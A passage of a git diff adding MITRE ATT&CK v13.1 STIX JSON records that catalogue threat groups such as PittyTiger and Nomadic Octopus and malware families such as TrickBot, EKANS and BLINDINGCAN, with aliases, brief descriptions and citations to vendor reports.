Team", + "description": "(Citation: FireEye APT Groups)" + }, + { + "source_name": "APT19", + "description": "(Citation: FireEye APT19)" + }, + { + "source_name": "Codoso", + "description": "(Citation: Unit 42 C0d0so0 Jan 2016)" + }, + { + "source_name": "C0d0so0", + "description": "(Citation: Unit 42 C0d0so0 Jan 2016)" + }, + { + "source_name": "FireEye APT19", + "description": "Ahl, I. (2017, June 06). Privileges and Credentials: Phished at the Request of Counsel. Retrieved May 17, 2018.", + "url": "https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html" + }, + { + "source_name": "Dark Reading Codoso Feb 2015", + "description": "Chickowski, E. (2015, February 10). Chinese Hacking Group Codoso Team Uses Forbes.com As Watering Hole. Retrieved September 13, 2018.", + "url": "https://www.darkreading.com/attacks-breaches/chinese-hacking-group-codoso-team-uses-forbescom-as-watering-hole-/d/d-id/1319059" + }, + { + "source_name": "FireEye APT Groups", + "description": "FireEye. (n.d.). Advanced Persistent Threat Groups. Retrieved August 3, 2018.", + "url": "https://www.fireeye.com/current-threats/apt-groups.html#apt19" + }, + { + "source_name": "Unit 42 C0d0so0 Jan 2016", + "description": "Grunzweig, J., Lee, B. (2016, January 22). New Attacks Linked to C0d0so0 Group. Retrieved August 2, 2018.", + "url": "https://researchcenter.paloaltonetworks.com/2016/01/new-attacks-linked-to-c0d0s0-group/" + }, + { + "source_name": "ICIT China's Espionage Jul 2016", + "description": "Scott, J. and Spaniel, D. (2016, July 28). ICIT Brief - China\u2019s Espionage Dynasty: Economic Death by a Thousand Cuts. Retrieved June 7, 2018.", + "url": "https://web.archive.org/web/20171017072306/https://icitech.org/icit-brief-chinas-espionage-dynasty-economic-death-by-a-thousand-cuts/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--fe98767f-9df8-42b9-83c9-004b1dec8647.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--fe98767f-9df8-42b9-83c9-004b1dec8647.json new file mode 100644 index 0000000000000000000000000000000000000000..f02d853acbc3789c28a8c8a371a4d4288a46c03f --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--fe98767f-9df8-42b9-83c9-004b1dec8647.json @@ -0,0 +1,48 @@ +{ + "type": "bundle", + "id": "bundle--be34ad0b-d6f8-4de6-97d9-c10d0b402f35", + "spec_version": "2.0", + "objects": [ + { + "aliases": [ + "PittyTiger" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "intrusion-set--fe98767f-9df8-42b9-83c9-004b1dec8647", + "type": "intrusion-set", + "created": "2017-05-31T21:31:50.198Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "G0011", + "url": "https://attack.mitre.org/groups/G0011", + "source_name": "mitre-attack" + }, + { + "source_name": "PittyTiger", + "description": "(Citation: Bizeul 2014) (Citation: Villeneuve 2014)" + }, + { + "url": "https://airbus-cyber-security.com/the-eye-of-the-tiger/", + "description": "Bizeul, D., Fontarensky, I., Mouchoux, R., Perigaud, F., Pernet, C. (2014, July 11). Eye of the Tiger. Retrieved September 29, 2015.", + "source_name": "Bizeul 2014" + }, + { + "url": "https://www.fireeye.com/blog/threat-research/2014/07/spy-of-the-tiger.html", + "description": "Villeneuve, N., Homan, J. (2014, July 31). Spy of the Tiger. Retrieved September 29, 2015.", + "source_name": "Villeneuve 2014" + } + ], + "modified": "2021-10-12T23:11:41.368Z", + "name": "PittyTiger", + "description": "[PittyTiger](https://attack.mitre.org/groups/G0011) is a threat group believed to operate out of China that uses multiple different types of malware to maintain command and control.(Citation: Bizeul 2014)(Citation: Villeneuve 2014)", + "x_mitre_version": "1.2", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--fed4f0a2-4347-4530-b0f5-6dfd49b29172.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--fed4f0a2-4347-4530-b0f5-6dfd49b29172.json new file mode 100644 index 0000000000000000000000000000000000000000..557e6ba762449441673b0b9fd3d151caee30ca3e --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--fed4f0a2-4347-4530-b0f5-6dfd49b29172.json @@ -0,0 +1,66 @@ +{ + "type": "bundle", + "id": "bundle--6f5a12b3-0949-4067-a8d1-395b858cc05c", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-09-02T18:03:55.294Z", + "name": "Nomadic Octopus", + "description": "\n[Nomadic Octopus](https://attack.mitre.org/groups/G0133) is a Russian-speaking cyber espionage threat group that has primarily targeted Central Asia, including local governments, diplomatic missions, and individuals, since at least 2014. [Nomadic Octopus](https://attack.mitre.org/groups/G0133) has been observed conducting campaigns involving Android and Windows malware, mainly using the Delphi programming language, and building custom variants.(Citation: Security Affairs DustSquad Oct 2018)(Citation: Securelist Octopus Oct 2018)(Citation: ESET Nomadic Octopus 2018)", + "aliases": [ + "Nomadic Octopus", + "DustSquad" + ], + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "type": "intrusion-set", + "id": "intrusion-set--fed4f0a2-4347-4530-b0f5-6dfd49b29172", + "created": "2021-08-24T17:04:27.002Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0133", + "external_id": "G0133" + }, + { + "source_name": "DustSquad", + "description": "(Citation: Security Affairs DustSquad Oct 2018)(Citation: Securelist Octopus Oct 2018)(Citation: SecurityWeek Nomadic Octopus Oct 2018)" + }, + { + "source_name": "Nomadic Octopus", + "description": "(Citation: SecurityWeek Nomadic Octopus Oct 2018)(Citation: ESET Nomadic Octopus 2018)" + }, + { + "source_name": "ESET Nomadic Octopus 2018", + "description": "Cherepanov, A. (2018, October 4). Nomadic Octopus Cyber espionage in Central Asia. Retrieved October 13, 2021.", + "url": "https://www.virusbulletin.com/uploads/pdf/conference_slides/2018/Cherepanov-VB2018-Octopus.pdf" + }, + { + "source_name": "Securelist Octopus Oct 2018", + "description": "Kaspersky Lab's Global Research & Analysis Team. (2018, October 15). Octopus-infested seas of Central Asia. Retrieved November 14, 2018.", + "url": "https://securelist.com/octopus-infested-seas-of-central-asia/88200/" + }, + { + "source_name": "SecurityWeek Nomadic Octopus Oct 2018", + "description": "Kovacs, E. (2018, October 18). Russia-Linked Hackers Target Diplomatic Entities in Central Asia. Retrieved October 13, 2021.", + "url": "https://www.securityweek.com/russia-linked-hackers-target-diplomatic-entities-central-asia" + }, + { + "source_name": "Security Affairs DustSquad Oct 2018", + "description": "Paganini, P. (2018, October 16). Russia-linked APT group DustSquad targets diplomatic entities in Central Asia. Retrieved August 24, 2021.", + "url": "https://securityaffairs.co/wordpress/77165/apt/russia-linked-apt-dustsquad.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--007b44b6-e4c5-480b-b5b9-56f2081b1b7b.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--007b44b6-e4c5-480b-b5b9-56f2081b1b7b.json new file mode 100644 index 0000000000000000000000000000000000000000..a4444aef64c669ee200ff5c6a4239374b8e08c3d --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--007b44b6-e4c5-480b-b5b9-56f2081b1b7b.json @@ -0,0 +1,49 @@ +{ + "type": "bundle", + "id": "bundle--31c6615f-5c79-4bda-acfe-c054fad240b6", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-04-04T20:20:59.961Z", + "name": "HDoor", + "description": "[HDoor](https://attack.mitre.org/software/S0061) is malware that has been customized and used by the [Naikon](https://attack.mitre.org/groups/G0019) group. (Citation: Baumgartner Naikon 2015)", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_aliases": [ + "HDoor", + "Custom HDoor" + ], + "type": "malware", + "id": "malware--007b44b6-e4c5-480b-b5b9-56f2081b1b7b", + "created": "2017-05-31T21:32:40.801Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0061", + "external_id": "S0061" + }, + { + "source_name": "Baumgartner Naikon 2015", + "description": "Baumgartner, K., Golovkin, M.. (2015, May). The MsnMM Campaigns: The Earliest Naikon APT Campaigns. Retrieved April 10, 2019.", + "url": "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07205555/TheNaikonAPT-MsnMM1.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--00806466-754d-44ea-ad6f-0caf59cb8556.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--00806466-754d-44ea-ad6f-0caf59cb8556.json new file mode 100644 index 0000000000000000000000000000000000000000..fc64574d9e841b5627121f46ed673bfb48d03939 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--00806466-754d-44ea-ad6f-0caf59cb8556.json @@ -0,0 +1,98 @@ +{ + "type": "bundle", + "id": "bundle--dbdf8fe7-ef1f-4f0a-9e22-8558a8738ff8", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-02-23T19:45:50.419Z", + "name": "TrickBot", + "description": "[TrickBot](https://attack.mitre.org/software/S0266) is a Trojan spyware program written in C++ that first emerged in September 2016 as a possible successor to [Dyre](https://attack.mitre.org/software/S0024). [TrickBot](https://attack.mitre.org/software/S0266) was developed and initially used by [Wizard Spider](https://attack.mitre.org/groups/G0102) for targeting banking sites in North America, Australia, and throughout Europe; it has since been used against all sectors worldwide as part of \"big game hunting\" ransomware campaigns.(Citation: S2 Grupo TrickBot June 2017)(Citation: Fidelis TrickBot Oct 2016)(Citation: IBM TrickBot Nov 2016)(Citation: CrowdStrike Wizard Spider October 2020)", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "2.0", + "x_mitre_contributors": [ + "Daniyal Naeem, BT Security", + "Cybereason Nocturnus, @nocturnus", + "Omkar Gudhate", + "FS-ISAC" + ], + "x_mitre_aliases": [ + "TrickBot", + "Totbrick", + "TSPY_TRICKLOAD" + ], + "type": "malware", + "id": "malware--00806466-754d-44ea-ad6f-0caf59cb8556", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0266", + "external_id": "S0266" + }, + { + "source_name": "TrickBot", + "description": "(Citation: S2 Grupo TrickBot June 2017) (Citation: Trend Micro Totbrick Oct 2016) (Citation: TrendMicro Trickbot Feb 2019)" + }, + { + "source_name": "TSPY_TRICKLOAD", + "description": "(Citation: Trend Micro Totbrick Oct 2016)" + }, + { + "source_name": "Totbrick", + "description": "(Citation: Trend Micro Totbrick Oct 2016) (Citation: Microsoft Totbrick Oct 2017)" + }, + { + "source_name": "Trend Micro Totbrick Oct 2016", + "description": "Antazo, F. (2016, October 31). TSPY_TRICKLOAD.N. Retrieved September 14, 2018.", + "url": "https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/tspy_trickload.n" + }, + { + "source_name": "IBM TrickBot Nov 2016", + "description": "Keshet, L. (2016, November 09). Tricks of the Trade: A Deeper Look Into TrickBot\u2019s Machinations. Retrieved August 2, 2018.", + "url": "https://securityintelligence.com/tricks-of-the-trade-a-deeper-look-into-trickbots-machinations/" + }, + { + "source_name": "TrendMicro Trickbot Feb 2019", + "description": "Llimos, N., Pascual, C.. (2019, February 12). Trickbot Adds Remote Application Credential-Grabbing Capabilities to Its Repertoire. Retrieved March 12, 2019.", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/trickbot-adds-remote-application-credential-grabbing-capabilities-to-its-repertoire/" + }, + { + "source_name": "CrowdStrike Wizard Spider October 2020", + "description": "Podlosky, A., Hanel, A. et al. (2020, October 16). WIZARD SPIDER Update: Resilient, Reactive and Resolute. Retrieved June 15, 2021.", + "url": "https://www.crowdstrike.com/blog/wizard-spider-adversary-update/" + }, + { + "source_name": "Microsoft Totbrick Oct 2017", + "description": "Pornasdoro, A. (2017, October 12). Trojan:Win32/Totbrick. Retrieved September 14, 2018.", + "url": "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/Totbrick" + }, + { + "source_name": "Fidelis TrickBot Oct 2016", + "description": "Reaves, J. (2016, October 15). TrickBot: We Missed you, Dyre. Retrieved August 2, 2018.", + "url": "https://www.fidelissecurity.com/threatgeek/2016/10/trickbot-we-missed-you-dyre" + }, + { + "source_name": "S2 Grupo TrickBot June 2017", + "description": "Salinas, M., Holguin, J. (2017, June). Evolution of Trickbot. Retrieved July 31, 2018.", + "url": "https://www.securityartwork.es/wp-content/uploads/2017/07/Trickbot-report-S2-Grupo.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--00c3bfcb-99bd-4767-8c03-b08f585f5c8a.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--00c3bfcb-99bd-4767-8c03-b08f585f5c8a.json new file mode 100644 index 0000000000000000000000000000000000000000..d347b72b5973a7e1a1e190b31c597103ac9f6490 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--00c3bfcb-99bd-4767-8c03-b08f585f5c8a.json @@ -0,0 +1,50 @@ +{ + "type": "bundle", + "id": "bundle--46c92d4d-8003-4878-950a-c5f613f9c7ef", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "PowerDuke" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--00c3bfcb-99bd-4767-8c03-b08f585f5c8a", + "type": "malware", + "created": "2017-05-31T21:33:19.746Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0139", + "external_id": "S0139" + }, + { + "source_name": "PowerDuke", + "description": "(Citation: Volexity PowerDuke November 2016)" + }, + { + "source_name": "Volexity PowerDuke November 2016", + "description": "Adair, S.. (2016, November 9). PowerDuke: Widespread Post-Election Spear Phishing Campaigns Targeting Think Tanks and NGOs. Retrieved January 11, 2017.", + "url": "https://www.volexity.com/blog/2016/11/09/powerduke-post-election-spear-phishing-campaigns-targeting-think-tanks-and-ngos/" + } + ], + "modified": "2020-03-30T17:22:08.256Z", + "name": "PowerDuke", + "description": "[PowerDuke](https://attack.mitre.org/software/S0139) is a backdoor that was used by [APT29](https://attack.mitre.org/groups/G0016) in 2016. It has primarily been delivered through Microsoft Word or Excel attachments containing malicious macros. (Citation: Volexity PowerDuke November 2016)", + "x_mitre_version": "1.2", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--00e7d565-9883-4ee5-b642-8fd17fd6a3f5.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--00e7d565-9883-4ee5-b642-8fd17fd6a3f5.json new file mode 100644 index 0000000000000000000000000000000000000000..8c809cd80dfa6b0ad2a066bcaa19a2bf6eb60da1 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--00e7d565-9883-4ee5-b642-8fd17fd6a3f5.json @@ -0,0 +1,68 @@ +{ + "type": "bundle", + "id": "bundle--4e399473-3c95-4843-96cc-0a9e7e44c333", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-08T22:04:48.834Z", + "name": "EKANS", + "description": "[EKANS](https://attack.mitre.org/software/S0605) is ransomware variant written in Golang that first appeared in mid-December 2019 and has been used against multiple sectors, including energy, healthcare, and automotive manufacturing, which in some cases resulted in significant operational disruptions. [EKANS](https://attack.mitre.org/software/S0605) has used a hard-coded kill-list of processes, including some associated with common ICS software platforms (e.g., GE Proficy, Honeywell HMIWeb, etc), similar to those defined in [MegaCortex](https://attack.mitre.org/software/S0576).(Citation: Dragos EKANS)(Citation: Palo Alto Unit 42 EKANS)", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack", + "ics-attack" + ], + "x_mitre_version": "2.0", + "x_mitre_aliases": [ + "EKANS", + "SNAKEHOSE" + ], + "type": "malware", + "id": "malware--00e7d565-9883-4ee5-b642-8fd17fd6a3f5", + "created": "2021-02-12T20:07:42.883Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0605", + "external_id": "S0605" + }, + { + "source_name": "EKANS", + "description": "(Citation: Dragos EKANS)(Citation: Palo Alto Unit 42 EKANS)(Citation: FireEye Ransomware Feb 2020)" + }, + { + "source_name": "SNAKEHOSE", + "description": "(Citation: FireEye Ransomware Feb 2020)" + }, + { + "source_name": "Dragos EKANS", + "description": "Dragos. (2020, February 3). EKANS Ransomware and ICS Operations. Retrieved February 9, 2021.", + "url": "https://www.dragos.com/blog/industry-news/ekans-ransomware-and-ics-operations/" + }, + { + "source_name": "Palo Alto Unit 42 EKANS", + "description": "Hinchliffe, A. Santos, D. (2020, June 26). Threat Assessment: EKANS Ransomware. Retrieved February 9, 2021.", + "url": "https://unit42.paloaltonetworks.com/threat-assessment-ekans-ransomware/" + }, + { + "source_name": "FireEye Ransomware Feb 2020", + "description": "Zafra, D., et al. (2020, February 24). Ransomware Against the Machine: How Adversaries are Learning to Disrupt Industrial Production by Targeting IT and OT. Retrieved March 2, 2021.", + "url": "https://www.fireeye.com/blog/threat-research/2020/02/ransomware-against-machine-learning-to-disrupt-industrial-production.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--01dbc71d-0ee8-420d-abb4-3dfb6a4bf725.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--01dbc71d-0ee8-420d-abb4-3dfb6a4bf725.json new file mode 100644 index 0000000000000000000000000000000000000000..b675449ef32be91db2638acc5608f36d2bdf83e9 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--01dbc71d-0ee8-420d-abb4-3dfb6a4bf725.json @@ -0,0 +1,54 @@ +{ + "type": "bundle", + "id": "bundle--fef426e1-3c0a-4f21-99a1-e3b145c42826", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Daniyal Naeem, BT Security" + ], + "x_mitre_aliases": [ + "BLINDINGCAN" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--01dbc71d-0ee8-420d-abb4-3dfb6a4bf725", + "type": "malware", + "created": "2020-10-27T18:45:58.576Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0520", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0520" + }, + { + "source_name": "US-CERT BLINDINGCAN Aug 2020", + "url": "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-232a", + "description": "US-CERT. (2020, August 19). MAR-10295134-1.v1 \u2013 North Korean Remote Access Trojan: BLINDINGCAN. Retrieved August 19, 2020." + }, + { + "source_name": "NHS UK BLINDINGCAN Aug 2020", + "url": "https://digital.nhs.uk/cyber-alerts/2020/cc-3603", + "description": "NHS Digital . (2020, August 20). BLINDINGCAN Remote Access Trojan. Retrieved August 20, 2020." + } + ], + "modified": "2021-03-17T15:55:56.257Z", + "name": "BLINDINGCAN", + "description": "[BLINDINGCAN](https://attack.mitre.org/software/S0520) is a remote access Trojan that has been used by the North Korean government since at least early 2020 in cyber operations against defense, engineering, and government organizations in Western Europe and the US.(Citation: US-CERT BLINDINGCAN Aug 2020)(Citation: NHS UK BLINDINGCAN Aug 2020)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--039814a0-88de-46c5-a4fb-b293db21880a.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--039814a0-88de-46c5-a4fb-b293db21880a.json new file mode 100644 index 0000000000000000000000000000000000000000..4d98dfd48b99c48afc61c045fff4b5249a437790 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--039814a0-88de-46c5-a4fb-b293db21880a.json @@ -0,0 +1,55 @@ +{ + "type": "bundle", + "id": "bundle--eee33094-2bb0-4d5d-9a0e-f555d84e269c", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "Wiarp" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--039814a0-88de-46c5-a4fb-b293db21880a", + "type": "malware", + "created": "2018-04-18T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0206", + "external_id": "S0206" + }, + { + "source_name": "Wiarp", + "description": "(Citation: Symantec Wiarp May 2012)" + }, + { + "url": "https://web.archive.org/web/20190717233006/http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdf", + "description": "O'Gorman, G., and McDonald, G.. (2012, September 6). The Elderwood Project. Retrieved February 15, 2018.", + "source_name": "Symantec Elderwood Sept 2012" + }, + { + "source_name": "Symantec Wiarp May 2012", + "description": "Zhou, R. (2012, May 15). Backdoor.Wiarp. Retrieved February 22, 2018.", + "url": "https://www.symantec.com/security_response/writeup.jsp?docid=2012-051606-1005-99" + } + ], + "modified": "2021-01-06T19:32:28.378Z", + "name": "Wiarp", + "description": "[Wiarp](https://attack.mitre.org/software/S0206) is a trojan used by [Elderwood](https://attack.mitre.org/groups/G0066) to open a backdoor on compromised hosts. (Citation: Symantec Elderwood Sept 2012) (Citation: Symantec Wiarp May 2012)", + "x_mitre_version": "1.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--03acae53-9b98-46f6-b204-16b930839055.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--03acae53-9b98-46f6-b204-16b930839055.json new file mode 100644 index 0000000000000000000000000000000000000000..b727fc1a19199fd26d8597b800ccdb5564d2a6b7 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--03acae53-9b98-46f6-b204-16b930839055.json @@ -0,0 +1,58 @@ +{ + "type": "bundle", + "id": "bundle--4201fcc3-a37a-47e6-9429-cf75e7087038", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-26T19:54:58.293Z", + "name": "RCSession", + "description": "[RCSession](https://attack.mitre.org/software/S0662) is a backdoor written in C++ that has been in use since at least 2018 by [Mustang Panda](https://attack.mitre.org/groups/G0129) and by [Threat Group-3390](https://attack.mitre.org/groups/G0027) (Type II Backdoor).(Citation: Secureworks BRONZE PRESIDENT December 2019)(Citation: Trend Micro Iron Tiger April 2021)(Citation: Trend Micro DRBControl February 2020)", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.1", + "x_mitre_aliases": [ + "RCSession" + ], + "type": "malware", + "id": "malware--03acae53-9b98-46f6-b204-16b930839055", + "created": "2021-11-19T19:47:26.552Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0662", + "external_id": "S0662" + }, + { + "source_name": "Secureworks BRONZE PRESIDENT December 2019", + "description": "Counter Threat Unit Research Team. (2019, December 29). BRONZE PRESIDENT Targets NGOs. Retrieved April 13, 2021.", + "url": "https://www.secureworks.com/research/bronze-president-targets-ngos" + }, + { + "source_name": "Trend Micro Iron Tiger April 2021", + "description": "Lunghi, D. and Lu, K. (2021, April 9). Iron Tiger APT Updates Toolkit With Evolved SysUpdate Malware. Retrieved November 12, 2021.", + "url": "https://www.trendmicro.com/en_us/research/21/d/iron-tiger-apt-updates-toolkit-with-evolved-sysupdate-malware-va.html" + }, + { + "source_name": "Trend Micro DRBControl February 2020", + "description": "Lunghi, D. et al. (2020, February). Uncovering DRBControl. Retrieved November 12, 2021.", + "url": "https://documents.trendmicro.com/assets/white_papers/wp-uncovering-DRBcontrol.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--03ea629c-517a-41e3-94f8-c7e5368cf8f4.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--03ea629c-517a-41e3-94f8-c7e5368cf8f4.json new file mode 100644 index 0000000000000000000000000000000000000000..24a407e62d053e8f1a1b36c63680ecef33679150 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--03ea629c-517a-41e3-94f8-c7e5368cf8f4.json @@ -0,0 +1,50 @@ +{ + "type": "bundle", + "id": "bundle--117e0d35-7701-4d4b-8730-681d64203a4a", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "Spark" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--03ea629c-517a-41e3-94f8-c7e5368cf8f4", + "type": "malware", + "created": "2020-12-15T01:30:05.198Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0543", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0543" + }, + { + "source_name": "Spark", + "description": "\n(Citation: Unit42 Molerat Mar 2020) " + }, + { + "source_name": "Unit42 Molerat Mar 2020", + "url": "https://unit42.paloaltonetworks.com/molerats-delivers-spark-backdoor/", + "description": "Falcone, R., et al. (2020, March 3). Molerats Delivers Spark Backdoor to Government and Telecommunications Organizations. Retrieved December 14, 2020." + } + ], + "modified": "2021-08-18T23:49:01.615Z", + "name": "Spark", + "description": "\n[Spark](https://attack.mitre.org/software/S0543) is a Windows backdoor and has been in use since as early as 2017.(Citation: Unit42 Molerat Mar 2020) ", + "x_mitre_version": "1.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--03eb4a05-6a02-43f6-afb7-3c7835501828.json 